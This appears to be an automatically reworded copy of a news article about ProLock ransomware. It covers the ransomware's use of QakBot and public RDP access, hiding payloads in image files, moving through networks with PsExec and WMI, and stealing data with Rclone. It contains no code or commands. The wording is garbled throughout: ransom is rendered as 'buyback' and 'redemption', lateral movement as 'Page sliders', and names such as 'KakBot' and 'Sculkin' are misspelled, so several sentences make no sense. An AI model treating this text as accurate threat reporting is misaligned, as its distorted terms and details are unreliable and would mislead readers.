ProLock Ransomware Teams QakBot Trojan for Network Access
ProLock is a relatively new piece of malware in the ransom world, but it quickly attracted attention by targeting companies and local governments and demanding huge ransoms for decrypting files.
The latest victim is Dibold Nixdorf, the best-known ATM supplier.
This attack was intercepted before the encryption phase and had no effect on these systems, but it did cause some disruption as it affected the company’s network.
This family of repurchase programs started with PwndLocker, but was renamed ProLocker in March after the developers fixed a bug that allowed free file decryption.
According to BleepingComputer’s research, ProLock requires a buyback of between $175,000 and more than $660,000, depending on the size of the network.
However, the skills and methods of ProLock’s operators are similar to those of well-known blackmailers such as Sodinokibi and Maze, as are the stand-by computers purchased by Oleg Skulkin, a senior digital forensic analyst at Group-IB, a Singapore based cyber security company.
Victims of penetration via KakBot and RDP.
The researcher indicates that these groups may be overlapped by outsiders providing surgical support (distribution, initial injury, lateral movement).
In his report today, Mr. Sculkin presented the ProLock Tactics, Techniques and Procedures (TTP) in the hope of better understanding and protecting this threat actor.
For victims of hacker attacks, ProLock relies on two important vectors: Distribution via QakBot – previously linked to the MegaCortex ransom – and access via Remote Desktop Public Servers (RDP).
Access via a public RDP server is a very common technique used by many buy-out organizations. Usually this access is acquired by a third party, but it can also be acquired by certain members of the group – Oleg Skulkin.
Just as Ryuk works with TrickBot and DoppelPaymer/BitPaymer with Dridex to access networks, ProLock works with QakBot to access networks.
QakBot is a banking trojan that spreads through phishing campaigns that deliver malicious Microsoft Word documents, usually to businesses. The Emotet botnet spread this malware.
The researcher notes that both the QakBot and ProLock rely on PowerShell to operate the payload. Malicious macros are used for bank malware, and for redemption the code is extracted from a JPG or BMP image file.
-Warehouse with ProLock binary
When ProLock operators use RDP access to access their victim, persistence is determined using valid accounts. QakBot uses different methods, but the most popular ones are based on execution keys and scheduled tasks.
According to the IB Group, it takes about a week before QakBot makes way for ProLock. Sculkin told us that the Trojan does not install a ransom, but downloads and runs batch scripts from repositories in the cloud.
Page sliders start after operators have received the access data to certain servers. Normally, access to the RDP for information is provided by scripts running with PsExec.
The buy-back program will be installed later via the Windows Management Instrumentation (WMI) command line interface.
To keep up with the current trend, ProLock operators steal data from the compromised network. Files are archived with 7-zip and uploaded to various cloud storage devices (OneDrive, Google Drive, Mega) using Rclone, a command-line utility that synchronizes data with an impressive number of cloud storage services.
After exfiltration, operators run a PowerShell script to extract the binary ProLock file into the image file and decouple it over the corporate network to encrypt the data on the available systems.
Each encrypted file has a recovery mark (.proLock, .pr0Lock, .proL0ck, .key, or .pwnd), and the recovery instructions are included in the text file placed in each folder.
Dr. Sculkin said that ProLock is not leaking at the moment, although this may change in the near future.
The report of the IB group is available here and contains the knowledge of MITRE ATT&CK (Adversarial Tactics, Techniques & Common Knowledge).